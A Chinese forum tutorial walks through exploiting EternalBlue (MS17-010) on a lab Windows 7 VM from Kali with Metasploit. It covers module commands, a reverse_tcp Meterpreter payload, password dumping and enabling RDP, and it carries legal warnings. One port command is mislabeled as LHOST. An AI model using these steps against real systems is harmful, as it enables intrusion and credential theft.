本帖最后由 无赖叫兽 于 2022-10-17 14:30 编辑
1、环境介绍
需要在自己PC上安装vmware workstation,之后部署两台虚拟机,一台纯净版win7,一台kali linux。 win7的IP地址192.168.206.136,本机防火墙关闭; Kali linux IP地址 192.168.206.135;
申明:需要搭建虚拟机做为靶机,不要找其他主机测试,即便是给客户好意做渗透也需要客户的书面授权书,切勿自行攻击或测试某个网站是否有漏洞,不然触犯网络安全法,面临的将是法律的严惩。
注:win7需要在https://msdn.itellyou.cn上下载的纯净版,这个网站里的所有操作系统镜像都是未打补丁的,并且不带第三方安全软件。2017年以前出的系统都可以,包括windows server 2018R2等,纯净版都会有永恒之蓝漏洞。
2、kali安装
下载完解压
双击,加载,如果有报错,在Vmware workstation里右键该虚拟机,将操作系统改为liunx
启动后用户名和密码默认都是kali 进系统后点击如下图标可进入控制台
3、最强渗透工具 - metasploit 简称msf Ctrl+shift+“+” 放大字符 Ctrl+”-” 缩小字符
输入msfconsloe进入msf管理界面
4、metasploit利用永恒之蓝漏洞攻击windows
先可以扫描下哪些端口开放,利用nmap集成工具
4.1 搜索模块
msf集成了上千个模块,第一步需要搜索模块,使用search ,搜索什么呢,你可以搜索永恒之蓝和漏洞编号,每一个漏洞,不论是CVE还是微软官方Microsoft也好,都会给定一个漏洞特定的编号,比如说永恒之蓝漏洞就被微软官方列为2017年第10个漏洞,所以编号命名为ms17_010,那有同学说,我怎么知道呢?可以在微软官方、github,百度等查阅漏洞编号。 我们search ms17_010
exploit打头的是攻击脚本,auxiliary是辅助脚本,是检测某个漏洞是否存在。
4.2 使用模块
搜索到了模块之后,使用use命令使用模块,use前面的序号号Name都可以,比如 use 0 或 use dxploit/windows/smb/ms17_010_eternalblue
4.3 设置模块
查看有哪些设置,使用命令show options或options
第一项是模块设置,name设置名,current setting设置项,required是否必选,description描述信息 首先需要与靶机网络相同,保证能ping通192.168.200.136
设置参数 set RHOSTS 192.168.206.136
再次查看配置
发现模块设置中的所有必填项已全部完成设置 再设置攻击载荷选项 最新版的payload的默认设置是对的,以前老版本设置是不正确的。老版本可以这样设置下: set payload windows/x64/meterpreter/reverse_tcp 设置LHOST即监听地址,即本地地址,会自动生成,可以查看下
设置监听端口 只要是没被占用的端口都可以,可以自行设置,也可以使用默认的端口 比如set LHOST 60000 查看所有项均已设置完成
4.4 攻击
直接输入命令run即可,等待攻击结果
当出现meterpreter就表示攻击成功了。
以后再出现个新的漏洞就可以像这样攻击了。
4.5 后渗透攻击
meterpreter 是一个高级的,动态的,可拓展的Payload,出现meterpreter 我们就有了shell,可以执行非常多的命令,去操控远端设备。 执行命:?或者help,显示出可以执行的全部命令。
翻译这些英文description描述就可以知道这些命令具体是干什么的, 比如
比如: 获取主机信息
看下截屏图
抓取用户密码
成功获取到用户密码。
开启远程桌面 run post/windows/manage/enable_rdp
在靶机上看下,远程桌面已经被开启
里面集成的命令还有很多,大家可以查看描述信息的功能或百度一一测试。
5、总结
这只是kalilinux的一个入门,触类旁通,再有其他漏洞我们就可以照样子测试了。我们攻击测试的目的在于加固主机,并不是为了攻击而攻击,攻击别人主机或网站是犯法的,特别是一些金融、国家机关类的网站。 另外,有人问,对于没有漏洞或暂未发现漏洞的主机我们就不能攻击了吗?答案是很有可能。我们要想方设法找出漏洞,真找不出漏洞,我们还可以使用远程木马攻击,由于篇幅和时间问题,下次我们再更新一点这方面的入门。多谢大家! |